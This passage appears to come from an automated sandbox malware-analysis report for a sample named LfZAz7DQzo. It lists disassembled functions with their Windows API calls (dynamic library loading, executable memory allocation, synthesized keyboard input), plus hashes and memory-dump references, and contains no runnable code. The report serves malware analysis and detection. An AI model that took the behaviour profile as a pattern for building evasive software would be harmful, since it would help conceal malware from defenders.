                                        • Opcode Fuzzy Hash: f68fa8e8cc0981327092dce9de57241784a62c874bd083b2765e6f04fe09f986
                                        • Instruction Fuzzy Hash: 0BD017B0910717CFD730AF31D808616B6E8BF5536AB118C3A988AE6AD0E770D884EB51
                                        Function 00F01072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00F012C1), ref: 00F01080
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F01092
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2574300362-4033151799
                                        • Opcode ID: 3a8ab3f11ba80109025dc6d61f83ca35add158c302074e2e322bc6fb6ca86a19
                                        • Instruction ID: 051f6453dacb361e124ab16d66f56ac64735c5b125cfe833fe00dda8cab62775
                                        • Opcode Fuzzy Hash: 3a8ab3f11ba80109025dc6d61f83ca35add158c302074e2e322bc6fb6ca86a19
                                        • Instruction Fuzzy Hash: 8AD0E230910712CFD7309B35E828A1BB6E4BF09361B11892AA8CADA590E770C880AA51
                                        Function 00EF93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EF9009,?,00F0F910), ref: 00EF9403
                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EF9415
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetModuleHandleExW$kernel32.dll
                                        • API String ID: 2574300362-199464113
                                        • Opcode ID: e0d69fa9ad78bbe9bc20191f9428e178c70cd9f5c94ee79f2fc242e34a1e6666
                                        • Instruction ID: feb17f1682fc1496bba1e7b980b5ac2e7c3ef39fe6449cdeff3264fff1e1214b
                                        • Opcode Fuzzy Hash: e0d69fa9ad78bbe9bc20191f9428e178c70cd9f5c94ee79f2fc242e34a1e6666
                                        • Instruction Fuzzy Hash: B9D0C73090031BCFC7318F32C948202B2E4BF14399B00C83AA8D2E2990E670C8C4EA51
                                        Function 00EC1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LocalTime__swprintf
                                        • String ID: %.3d$WIN_XPe
                                        • API String ID: 2070861257-2409531811
                                        • Opcode ID: b71e0f10558ecab087e36a742fe41d015e28a431cc5c2a3ce92ed6a892b6c30b
                                        • Instruction ID: 018bd0e4b3d9680c94969ba9eb50b7c6c621cff783ceb5453d34c3ab04f24986
                                        • Opcode Fuzzy Hash: b71e0f10558ecab087e36a742fe41d015e28a431cc5c2a3ce92ed6a892b6c30b
                                        • Instruction Fuzzy Hash: 3FD01271804118EACB18AAA08E44EF9737CAB0A311F1025D6B506B1441F2369F96AF22
                                        Function 00ED76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba4238cf5b01649e2509ef7440868015469eddbe3e3506c54ed930c4e882e48c
                                        • Instruction ID: 9dbdd675311b8226003f65ecf4debfe5e08de62dda9cd97676c3fab7bc41df33
                                        • Opcode Fuzzy Hash: ba4238cf5b01649e2509ef7440868015469eddbe3e3506c54ed930c4e882e48c
                                        • Instruction Fuzzy Hash: ACC17E75A04216EFCB14CF94C884EAEB7B5FF88714B11959AE885EB350E730DD82DB90
                                        Function 00EFE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 00EFE3D2
                                        • CharLowerBuffW.USER32(?,?), ref: 00EFE415
                                          • Part of subcall function 00EFDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EFDAD9
                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EFE615
                                        • _memmove.LIBCMT ref: 00EFE628
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                        • String ID:
                                        • API String ID: 3659485706-0
                                        • Opcode ID: c4dc8dca0984edcd8f333d0c1604632225584b98e20a28a0c2ec29940a0a19a8
                                        • Instruction ID: 3adb553fb841cb46d5e12bfc3673ca951a45baf18f2a7b25139635e0ca3e48b5
                                        • Opcode Fuzzy Hash: c4dc8dca0984edcd8f333d0c1604632225584b98e20a28a0c2ec29940a0a19a8
                                        • Instruction Fuzzy Hash: 64C17C716083058FC714DF28C48096ABBE4FF89718F14996EF999EB361D730E906CB82
                                        Function 00EF83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00EF83D8
                                        • CoUninitialize.COMBASE ref: 00EF83E3
                                          • Part of subcall function 00EDDA5D: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00EDDAC5
                                        • VariantInit.OLEAUT32(?), ref: 00EF83EE
                                        • VariantClear.OLEAUT32(?), ref: 00EF86BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                        • String ID:
                                        • API String ID: 780911581-0
                                        • Opcode ID: 875451c3a63d383eecafb6aa39a5a18f5afaf0be9653842bf24bac4db72caa53
                                        • Instruction ID: 6d538f75383a2a610b1606e7c0a0e7ae630946e7ca60b03cdaaea7a702f00cae
                                        • Opcode Fuzzy Hash: 875451c3a63d383eecafb6aa39a5a18f5afaf0be9653842bf24bac4db72caa53
                                        • Instruction Fuzzy Hash: 0FA15D756047059FCB10EF14C985B6AB7E4BF88314F09645DFA9AAB3A2CB30ED05CB46
                                        Function 00ED7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                        Download Yara Rule
                                        APIs
                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ED7C32
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00ED7C4A
                                        • CLSIDFromProgID.COMBASE(?,?), ref: 00ED7C6F
                                        • _memcmp.LIBCMT ref: 00ED7C90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: 6a0747fd1c69316a32433b7113e385dff8d55be1ca6e6b580745d45f8c823bf1
                                        • Instruction ID: a83fdcf077d85e30e8b60ea74a9769266a2292db8b7a0cf3d3bde60bcaed7510
                                        • Opcode Fuzzy Hash: 6a0747fd1c69316a32433b7113e385dff8d55be1ca6e6b580745d45f8c823bf1
                                        • Instruction Fuzzy Hash: 59811971A00109EFCB04DF94C984EEEB7B9FF89315F204199E546BB250EB71AE06CB60
                                        Function 00ED6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$AllocClearCopyInitString
                                        • String ID:
                                        • API String ID: 2808897238-0
                                        • Opcode ID: 9f09303c04e9b46368a53cd3b4473678fb6e0ad01d336409d3c15ac7bc8bddfb
                                        • Instruction ID: 467569dcfcfc7cfd31aa5ea83ebae361789cd71f72c3189a1bd0fd3aa43aeaaf
                                        • Opcode Fuzzy Hash: 9f09303c04e9b46368a53cd3b4473678fb6e0ad01d336409d3c15ac7bc8bddfb
                                        • Instruction Fuzzy Hash: 9651B934B047019ADB30AF65D891A6DB3E5EF48310F24B81FE99AFB3D1EB7098419B51
                                        Function 00F09A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(0116F8D8,?), ref: 00F09AD2
                                        • ScreenToClient.USER32(00000002,00000002), ref: 00F09B05
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F09B72
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 7d600cb4e1ac2e034768cab0e9e0695825a2591aa5598c979f18fff75536c38b
                                        • Instruction ID: b2ee47ac841638a716d462d66fbcd29b11139ab99a1756e89cb8d550504b7d39
                                        • Opcode Fuzzy Hash: 7d600cb4e1ac2e034768cab0e9e0695825a2591aa5598c979f18fff75536c38b
                                        • Instruction Fuzzy Hash: 95514C74A04209AFCF24DF58D8809AE7BB6FF95334F148159F8159B291E770AE81EB50
                                        Function 00EEBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EEBB09
                                        • GetLastError.KERNEL32(?,00000000), ref: 00EEBB2F
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EEBB54
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EEBB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 63247360016d4ffbcb5f2d67087e9fcda6b9914dbfebf398f48e582762788831
                                        • Instruction ID: beca317f359df26371d86df7f2276e4e5ff4f20ff998122791107a5f57a4713c
                                        • Opcode Fuzzy Hash: 63247360016d4ffbcb5f2d67087e9fcda6b9914dbfebf398f48e582762788831
                                        • Instruction Fuzzy Hash: B1412839600654DFCB20EF15C584A6EBBE1EF89314B199498E84EAB762CB34FD01DB91
                                        Function 00F08AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                        Download Yara Rule
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F08B4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        • Opcode ID: b97c221ef1b84398f8f1266274c942c52e168662d3c6b8b0d30b2ab4d8bc782f
                                        • Instruction ID: 7f2bf885a35c4325e4cbf95e67f939301a030503e586d05986bee9d36bc477fd
                                        • Opcode Fuzzy Hash: b97c221ef1b84398f8f1266274c942c52e168662d3c6b8b0d30b2ab4d8bc782f
                                        • Instruction Fuzzy Hash: 7D31D4F4A00208BEEF349E18CC45FA93BA5FB463A0F244512FAD1D76E1DE34A942B751
                                        Function 00F0ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 00F0AE1A
                                        • GetWindowRect.USER32(?,?), ref: 00F0AE90
                                        • PtInRect.USER32(?,?,00F0C304), ref: 00F0AEA0
                                        • MessageBeep.USER32(00000000), ref: 00F0AF11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: 419f02e2554af74aa439465bdea940b785497d774ef7935a90bef340f9742e5b
                                        • Instruction ID: 04af0cb72e659916a9ee44339fc3e321247a55e57cf8c47d673e6d3f567ebedf
                                        • Opcode Fuzzy Hash: 419f02e2554af74aa439465bdea940b785497d774ef7935a90bef340f9742e5b
                                        • Instruction Fuzzy Hash: E7417B75A00319DFCB11CF59C884BA9BBF5FF4A351F2881A9E814CB291D731A841FB92
                                        Function 00EE0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EE1037
                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EE1053
                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00EE10B9
                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00EE110B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: e9b5dab0a3893c1e57355614411857aab3954bda8e7342f7848dfe7764c3b06a
                                        • Instruction ID: 4ba782aa2bce8ac73cefe93042a45cfaf91413633b74794225568803668641f9
                                        • Opcode Fuzzy Hash: e9b5dab0a3893c1e57355614411857aab3954bda8e7342f7848dfe7764c3b06a
                                        • Instruction Fuzzy Hash: 37315630E446CCAEFF308B678C05BFEBBA9AB45324F08629AE591721D1C3758DC49761
                                        Function 00EE1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EE1176
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EE1192
                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00EE11F1
                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EE1243
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 41816faf08f73623112e1ab03771726733d282de105f383899f4091e82b55076
                                        • Instruction ID: eb048514ae79e0efb1d13d5df4f683db2f4385f2a02e732ad0c1c83e4b52c68b
                                        • Opcode Fuzzy Hash: 41816faf08f73623112e1ab03771726733d282de105f383899f4091e82b55076
                                        • Instruction Fuzzy Hash: 9A316830A4128C9AEF308AA78C047FE7BAAAB49314F08639AE691B21E1C37449C49751
                                        Function 00EB6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EB644B
                                        • __isleadbyte_l.LIBCMT ref: 00EB6479
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EB64A7
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EB64DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
